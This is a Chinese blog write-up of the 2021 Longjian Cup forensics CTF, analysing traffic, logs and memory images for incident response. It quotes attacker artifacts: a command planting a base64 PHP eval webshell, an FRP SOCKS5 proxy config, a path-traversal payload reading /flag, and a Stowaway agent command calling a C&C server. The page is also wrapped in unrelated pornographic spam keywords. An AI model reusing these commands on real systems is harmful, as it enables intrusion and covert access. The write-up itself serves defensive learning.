<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      應急響應-2021隴劍杯WP詳解

      2021隴劍杯WP詳解

      本次復現附件來自于DIDCTF,有興趣的話,大家也可以去該平臺獲取附件進行練習

      JWT

      jwt1

      昨天,單位流量系統捕獲了?客攻擊流量,請您分析流量后進?回答:
      該?站使?了( )認證方式?(如有字母則默認小寫)
      注意:此附件適用于jwt所有系列

      根據題目即可知道是jwt認證

      jwt2

      黑客繞過驗證使用的jwt中,id和username是___。(中間使用#號隔開,例如1#admin)

      查找username

      image-20250708180851347

      jwt3

      黑客獲取webshell之后,權限是___?(字母默認小寫)

      黑客查看自己的權限會使用whoami,搜索whoami后查看響應即可

      image-20250708181033626

      jwt4

      黑客上傳的惡意文件文件名是___。(請提交帶有文件后綴的文件名,例如x.txt)

      直接追蹤上一題的流量,直接就能看見惡意文件為1.c

      image-20250708181232105

      jwt5

      黑客在服務器上編譯的惡意so文件,文件名是___。(請提交帶有文件后綴的文件名,例如x.so)

      32條流,不多直接按個查看就行,翻了幾個找到對so文件的操作:looter.so

      image-20250708181359345

      jwt6

      黑客在服務器上修改了一個配置文件,文件的絕對路徑為___。(請確認絕對路徑后再提交)

      繼續跟蹤發現,將惡意so文件放入另一個位置:/etc/pam.d/common-auth

      image-20250708181535269

      Webshel

      Webshell-1

      黑客登陸系統使用的密碼是__

      可以用下邊語句進行過濾

      http.request.method == "POST" && http contains "login"

      也直接搜索password

      image-20250707143641415

      Webshell-2

      黑客修改了一個日志文件,文件的絕對路徑為__
      答題格式:/xx/xxx/xxx/xxx.log
      不區分大小寫

      過濾POST請求,查看請求信息

      http.request.method==POST

      前幾條能夠看見Form item: "tpl" = "data/Runtime/Logs/Home/21_08_07.log"

      但這是相對路徑

      繼續跟進查看

      image-20250707144156771

      寫入木馬文件

      system('echo PD9waHAgZXZhbCgkX1JFUVVFU1RbYWFhXSk7Pz4=|base64 -d > /var/www/html/1.php');

      分析可得絕對路徑為:

      /var/www/html/data/Runtime/Logs/Home/21_08_07.log

      Webshell-3

      黑客獲取webshell之后的權限是:

      先前查看時,發現執行了whoami命令

      追蹤流看到為www-data

      image-20250707144529387

      日志錯誤信息顯示:
      ERR: ...............:./Application/Home/View/default/www-data
      其中www-data即為whoami命令的執行結果,表明當前 Web 服務以www-data用戶運行。

      Webshell-4

      黑客寫入的webshell文件名是__。(請提交帶有文件后綴的文件名,例如x.txt)

      前邊已經看見木馬文件1.php

      Webshell-5

      黑客上傳的代理工具客戶端名字是__。
      (如有字母請全部使用小寫) 僅文件名,不要后綴名

      追蹤流發現frpc.ini

      image-20250707145257701

      FRP 工具確認

      • frpc 是 FRP(Fast Reverse Proxy)的客戶端組件,用于實現內網穿透。
      • .ini 文件通常作為 FRP 的配置文件,包含服務器地址、端口、代理規則等信息。
      • 在滲透測試或攻擊場景中,攻擊者常上傳 FRP 客戶端以建立反向代理,突破內網限制。

      故為 frpc

      補充

      下邊是對webshell工具的流量特征分析

      流量分析——菜刀、蟻劍、冰蝎、天蝎、哥斯拉 - sgthlg - 博客園

      流量特征分析——蟻劍、菜刀、冰蝎、哥斯拉-CSDN博客

      簡述一下蟻劍的特征:

      1. 選擇不同編碼器的數據形式

      默認:@ini_set("display_errors", "0");@set_time_limit(0);
      image-20250707150913074

      1. 響應包格式由隨機數作為定界符包裹結果

      image-20250707150703680

      1. 若使用了加密等插件繞過的話,加密后的數據沒用什么特別明顯的了,但是蟻劍混淆加密后還有一個比較明顯的特征,參數大多以“_0x.....=”這種形式,以_0x開頭的參數名,這個可能也可以換其他的固定字符,可以找出規律。

      Webshell-6

      黑客代理工具的回連服務端ip是_。

      在上一條流,即在流38中發現一串十六進制代碼,這是蟻劍特征的數據流 ,將=號后面的內容進行base16解碼

      image-20250707145607148

      解碼后即可看見回連IP

      image-20250707145819183

      實際攻擊行為分析

      1. 文件操作
      • 目標文件frpc.ini(FRP 客戶端配置文件)。
      • 操作類型:通過fwrite(fopen($f, "a"), $buf)追加內容到文件中,實現配置文件的修改或創建。
      1. 內網穿透工具部署
      • FRP 配置內容

        [common]
        server_addr = 192.168.239.123
        server_port = 7778
        token=Xa3BJf2l5enmN6Z7A8mv
        
        [test_socks5]
        type = tcp
        remote_port = 8111
        plugin = socks5
        plugin_user = 0HDFt16cLQJ
        plugin_passwd = JTN276Gp
        use_encryption = true
        use_compression = true
        
      • 功能:建立 SOCKS5 代理,將內網 8111 端口轉發到遠程服務器192.168.239.123:7778,用于橫向移動。

      Webshell-7

      黑客的socks5的連接賬號、密碼是__。(中間使用#號隔開,例如admin#passwd)

      根據上述分析可以得知為:0HDFt16cLQJ#JTN276Gp

      日志分析

      日志分析-1

      題目描述
      單位某應用程序被攻擊,請分析日志,進行作答:
      網絡存在源碼泄漏,源碼文件名是__
      注意:此附件適用于日志分析所有題目

      分析access.log文件,查找返回為200的請求

      image-20250707135934193

      發現WWW.zip泄露

      日志分析-2

      分析攻擊流量,黑客往/tmp目錄寫入一個文件,
      文件名為___。

      查找tmp

      image-20250707140217609

      分析目錄可知,文件名為sess_car

      日志分析-3

      分析攻擊流量,黑客使用的是__類讀取了秘密文件。

      上一題中寫入的文件就是執行了讀操作

      172.17.0.1 - - [07/Aug/2021:01:38:20 +0000] "GET /?filename=../../../../../../../../../../../../../../../../../tmp/sess_car&content=func|N;files|a:2:{s:8:"filename";s:16:"./files/filename";s:20:"call_user_func_array";s:28:"./files/call_user_func_array";}paths|a:1:{s:5:"/flag";s:13:"SplFileObject";} HTTP/1.1" 302 879 "-" "python-requests/2.26.0"
      

      分析該日志可知,這是一個典型的 PHP 序列化字符串,利用SplFileObject類讀取/flag文件

      故為:SplFileObject

      簡單日志分析-1

      題目描述
      某應用程序被攻擊,請分析日志后作答:
      黑客攻擊的參數是___。(如有字母請全部使用小寫)
      注意:此附件適用于簡單日志分析所有題目,后綴名為.zip

      目測是GET請求,查找問號

      image-20250707141017853

      看到訪問的參數

      簡單日志分析-2

      黑客查看的秘密文件的絕對路徑是___。(不帶 / )

      先前參數就是執行命令的

      image-20250707141316060

      將參數解碼后即可看見,執行的命令,包括讀取文件操作

      簡單日志分析-3

      黑客反彈shell的ip和端口是___。(格式使用“ip:端口",例如127.0.0.1:2333)

      同理,將第三個進行解碼即可獲取反彈shell信息

      image-20250707141458660

      sql注入

      sql1

      題目描述
      某應用程序被攻擊,請分析日志后作答:
      黑客在注入過程中采用的注入手法叫___。(格式為4個漢字,例如“拼搏努力”)
      注意:此附件適用于SQL注入所有題目

      盲猜也能猜到是布爾盲注

      簡單分析流量也可看出

      sql2

      黑客在注入過程中,最終獲取flag的數據庫名、表名和字段名是___。(格式為“數據庫名#表名#字段名”,例如database#table#column)

      根據最后爆破flag可看出數據庫的相關信息

      sql3(bool)

      黑客最后獲取到的flag字符串為__。

      使用nodepad手動分析,或者寫腳本都可以獲取盲注結果

      IOS

      ios1

      題目描述
      一位ios的安全研究員在家中使用手機聯網被黑,不僅被竊密還丟失比特幣若干,請你通過流量和日志分析后作答:
      黑客所控制的C&C服務器IP是___。

      C&C 服務器(Command & Control Server,命令與控制服務器) 是黑客用于遠程控制被控設備(如僵尸網絡、惡意軟件感染的主機)的核心基礎設施。黑客通過 C&C 服務器向被控設備發送指令、接收數據,實現竊取信息、勒索攻擊、分布式拒絕服務(DDoS)等惡意行為。獲取 C&C 服務器 IP 是網絡安全事件響應、溯源追蹤的關鍵步驟。

      導出對象分析,倒著查看object發現似乎是按順序產生的

      image-20250707164728232

      依次打開后邊幾個,找到C&C服務器IP

      ./ios_agent -c 3.128.156.159:8081 -s hack4sec

      ip為3.128.156.159

      ios2

      黑客利用的Github開源項目的名字是___。(如有字母請全部使用小寫)

      搜索github,接著追蹤流

      根據github域名可知,項目名為:Stowaway

      作者名 ph4ntonn 項目名 Stowaway 軟件名 ios_agent
      

      image-20250707165236299

      ios3

      通訊加密密鑰的明文是___。

      訪問github項目,查看使用方法

      image-20250707165908639

      在命令 ./ios_agent -c 3.128.156.159:8081 -s hack4sec 中:

      • -c 參數用于指定 C&C 服務器的地址和端口,即連接到 3.128.156.159:8081
      • -s 參數用于指定 通信加密密鑰,其明文為 hack4sec

      可知秘鑰明文為hack4sec

      ios4(bool)

      黑客通過SQL盲注拿到了一個敏感數據,內容是___。

      協議分級可知,傳輸層全為 TCP ,應用層經 TLS 加密,以 HTTP/2 承載業務

      image-20250707192640433

      按照http2過濾后進行篩選

      image-20250707193152312

      找到盲注語句

      image-20250707193330342

      用作過濾器,由于查詢是GET請求,在ip查詢基礎上再加上請求方式

      ip.addr eq 192.168.1.8 and ip.addr eq 192.168.1.12&&http2.headers.method == "GET"
      

      image-20250707200003171

      導出后,notepad進行url解碼

      image-20250707201304820

      每次都是從2B開始,找到下一個開始的前一條語句中的字符即為結果,但是還沒有很好的辦法去搜集

      ios5

      黑客端口掃描的掃描器的掃描范圍是__。(格式使用“開始端口-結束端口”,例如1-65535)

      掃描端口分析過程

      1. 端口掃描原理
        黑客通過向目標主機的連續端口發送 TCP/UDP 請求,并根據響應判斷端口是否開放。常見的掃描方式包括:
        • TCP SYN 掃描:發送 SYN 包,根據 SYN+ACK(開放)或 RST(關閉)響應判斷端口狀態。
        • TCP Connect 掃描:完整建立 TCP 連接(三次握手),若成功則端口開放,失敗則返回 RST 包。
      2. RST 報文的關鍵作用
        當掃描器向關閉的端口發送請求時,目標主機會返回RST(復位)報文以終止連接。通過捕獲這些 RST 報文,可反向推斷掃描器嘗試訪問的端口范圍。
        • 專家信息中的 RST:Wireshark 的 “專家信息” 功能會匯總異常流量,包括頻繁的 RST 報文。若發現大量 RST 且目標端口連續,即可確定掃描范圍。
      3. 掃描范圍的確定
        日志中雖未直接給出端口號,但結合安全實踐,黑客通常會進行全端口掃描(1-65535) 以發現潛在漏洞(如 SSH 22、HTTP 80、RDP 3389 等)。此外,Wireshark 專家信息中的 RST 報文若顯示連續的端口號(如 20-443),則可直接推斷掃描范圍。

      由于是端口掃描,所以會涉及到rst報文和連續端口訪問

      分析--》專家信息--》RST--》查找連續端口以確定范圍

      image-20250707175337443

      image-20250707175314185

      分析連續端口可知,范圍是10-499

      ios6

      黑客訪問/攻擊了內網的幾個服務器,IP地址為__。(多個IP之間按從小到大排序,使用#來分隔,例如127.0.0.1#192.168.0.1)

      先前的bool盲注訪問的ip是192.168.1.12

      在日志中找到兩個ip,只有ip為172.28.0.2能夠找到

      ip.addr==172.28.0.2

      image-20250707180359994

      故結果為: 172.28.0.2#192.168.1.12

      ios7

      黑客寫入了一個webshell,其密碼為:( )。(如有字母為小寫)

      webshell寫入后是需要密碼進行連接的,嘗試使用?進行查找,找到ma.php文件跟著參數

      image-20250707190745028

      故webshell密碼為 fxxk

      內存分析

      內存分析-1

      題目描述
      網管小王制作了一個虛擬機文件,讓您來分析后作答:
      虛擬機的密碼是___。(密碼中為flag{xxxx},含有空格,提交時不要去掉)

      除了Target.vmem鏡像文件,還有一個提示:

      no space but underline

      奇怪,題目上答案要求有空格

      加載鏡像文件

      image-20250708163737128

      使用lsadump查看密碼

      image-20250708163834291

      隱約看見flag信息,但是有多余字符

      image-20250708163917590

      將00替換為空,轉hex,去掉開頭的H,就是完整flag

      其實默認在系統密碼中就有

      image-20250708165353671

      內存分析-2

      虛擬機中有一個某品牌手機的備份文件,文件里的圖片里的字符串為__。(解題過程中需要用到上一題答案中flag內的內容進行處理。本題的格式也是flag{xx},答案含有空格時,空格不要去掉)

      進行文件分析,查找 image

      image-20250708175646583

      看到有一個圖片信息,下載后分析

      由于華為手機助手加密的文件解密時需要依賴整個文件夾中的文件,只有一個enc是不行的,還需要另一個exe文件

      查找 HUAWEI,找到exe

      image-20250708174928077

      將exe文件下載下來,當做zip打開

      image-20250708175046720

      去github找項目恢復文件

      GitHub - RealityNet/kobackupdec: Huawei backup decryptor

      根據參數要求,題目提示密碼是上一問的flag,并且要把空格換為下劃線,運行腳本進行恢復

      python3 kobackupdec.py -vvv W31C0M3_T0_THiS_34SY_F0R3NSiCX "../HUAWEI P40_2021-aa-bb xx.yy.zz" ../result
      

      image-20250708173032722

      恢復的結果中有一個壓縮包,打開就是需要的加密圖片

      image-20250708173125697

      參考wp

      完整的wp,但是不太詳細

      2021 隴劍杯wp - twosmi1e - 博客園

      posted @ 2025-07-15 15:04  F0T0ne  閱讀(4)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 中文字幕av国产精品| 国产亚洲精品成人aa片新蒲金| 欧美老少配性行为| 亚欧美闷骚院| 久久AV中文综合一区二区| 色色97| 2019国产精品青青草原| 国产日韩精品视频无码| 亚洲一区二区精品极品| 国产精品视频全国免费观看| 国产美女高潮流白浆视频| 亚洲av无码牛牛影视在线二区| а∨天堂一区中文字幕| 90后极品粉嫩小泬20p| 人妻少妇精品中文字幕| 99久久久国产精品免费蜜臀| 久久91精品牛牛| 国产成人片无码视频| 亚洲AV午夜电影在线观看| 亚洲综合伊人久久综合| 亚洲精品色哟哟一区二区| 日韩成人性视频在线观看| 精品在线观看视频二区| 无码粉嫩虎白一线天在线观看| 精品国产亚洲区久久露脸| 亚洲国产综合精品2020| 成 人 色 网 站免费观看| 亚洲精品久久久久国产| 久久欧洲精品成av人片| 成人精品日韩专区在线观看| 午夜精品福利亚洲国产| 精品国产一区二区三区四区阿崩| 极品蜜桃臀一区二区av| 日本少妇自慰免费完整版| 国产成人AV男人的天堂| 美女黄网站人色视频免费国产| 久久精品国产亚洲av久| 高潮毛片无遮挡高清视频播放| 亚洲av成人免费在线| 国产绿帽在线视频看| 亚洲另类无码一区二区三区 |